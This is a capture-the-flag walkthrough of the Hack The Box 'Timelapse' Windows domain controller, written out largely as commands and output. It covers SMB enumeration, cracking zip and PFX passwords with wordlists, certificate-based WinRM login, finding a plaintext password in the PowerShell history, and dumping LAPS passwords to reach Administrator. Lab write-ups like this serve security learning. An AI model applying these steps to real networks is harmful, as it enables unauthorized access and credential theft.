Hack The Box Timelapse Walkthrough


Initial recon


The machine is running on Windows. By default, Windows block ICMP requests, so pinging machines isn’t possible. On this box, the autor seems to have enabled ICMP :

$ ping -c2
PING ( 56(84) octets de données.
64 octets de : icmp_seq=1 ttl=127 temps=83.8 ms
64 octets de : icmp_seq=2 ttl=127 temps=83.5 ms

--- statistiques ping ---
2 paquets transmis, 2 reçus, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 83.485/83.620/83.755/0.135 ms

Port scanning

Here is the result of nmap port scanning :

$ sudo nmap -sSVC -p- -T5 -oA timelapse_full
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 10:39 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for
Host is up (0.18s latency).
Not shown: 65517 filtered tcp ports (no-response)
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-05-31 16:47:17Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-05-31T16:48:49+00:00; +7h59m53s from scanner time.
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
54524/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-31T16:48:08
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m52s, deviation: 0s, median: 7h59m52s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 579.88 seconds

The certificate gave us a domain name, and the name of the server :

  • timelapse.htb -> Domain
    • dc01.timelapse.htb -> Server name

With this informations we learn that the machine is a domain controler, and we can precise the OS is a Microsoft Windows Server.


Getting the archive

Share listing :

$ smbclient -L
Password for [MYGROUP\libereau]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

In the Shares folder, a .zip file is present, but protected by a password.

$ smbclient //
Password for [MYGROUP\libereau]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 17:39:15 2021
  ..                                  D        0  Mon Oct 25 17:39:15 2021
  Dev                                 D        0  Mon Oct 25 21:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 17:48:42 2021

                6367231 blocks of size 4096. 1319349 blocks available
smb: \> cd Dev
lsmb: \Dev\> ls
  .                                   D        0  Mon Oct 25 21:40:06 2021
  ..                                  D        0  Mon Oct 25 21:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 17:46:42 2021

                6367231 blocks of size 4096. 1318297 blocks available

Cracking the archive

The zip file is password protected.

Zip password protected

I’ve tried many thing, like zip2john, and trying to broke the hash, but it didn’t work. So I’ve found an online tool, which gave me the password for the zip file :

Cracked password

The password is “supremelegacy”.

The archive contain legacyy_dev_auth.pfx.

First access to the machine

A pfx file, in format PKCS#12, contain the SSL certificate and the corresponding private key. Those keys can be use to authenticate to a machine using evilwinrm.

After some googling (again !) I’ve found a tool to bruteforce pfx file, called crackpkcs12. The tool ask in input, the pfx file (obviously) and a dictionnary. I’ve run it with rock you, and after some times :

$ crackpkcs12 -d rockyou.txt legacyy_dev_auth.pfx 

Dictionary attack - Starting 1 threads
Dictionary attack - Thread 1 - Password found: thuglegacy

The password is then thuglegacy.

We can then extract the files using openssl :

$ openssl pkcs12 -in legacyy_dev_auth.pfx -out cert.pem -nodes
$ openssl pkcs12 -in legacyy_dev_auth.pfx -out win.key -nodes

The connection is then easy, if you don’t forget to use the “-S” parameter to force ssl :

First access

Privilege Escalation

After having the first access, the first thing to do is top upload winpeas.bat (or .exe) and run it. With evil-winrm you can just use the “upload” command to upload winpeas.bat on the server. I’ve run it, and saw something insteresting :

 Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

03/04/2022  12:46 AM               434 ConsoleHost_history.txt
               1 File(s)            434 bytes
               0 Dir(s)   9,038,331,904 bytes free

The content of the file is the following :

ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *

We can se a user svc_deploy and a password E3R$Q62^12p7PLlC%KWaxuaV which might be the svc_deploy password.

Previously, by looking at the SMB Shares folder we saw some documentation about LAPS.

LAPS for “Local Administrator Password Solution” provides management of local accounts passwords of domain joined computer. Passwords are stored in Active Directory, and protected by ACL.

Many tools are available on github for dumping LAPS passwords. I’ve used this one. You just have to specify user, password and domain name :

Extract passwords

This password is the Administrator password. We can then use it with evil-winrm to log in as Administrator.

Bim Bam Boom, rooted !

Admin connection

Thank you for reading, Libereau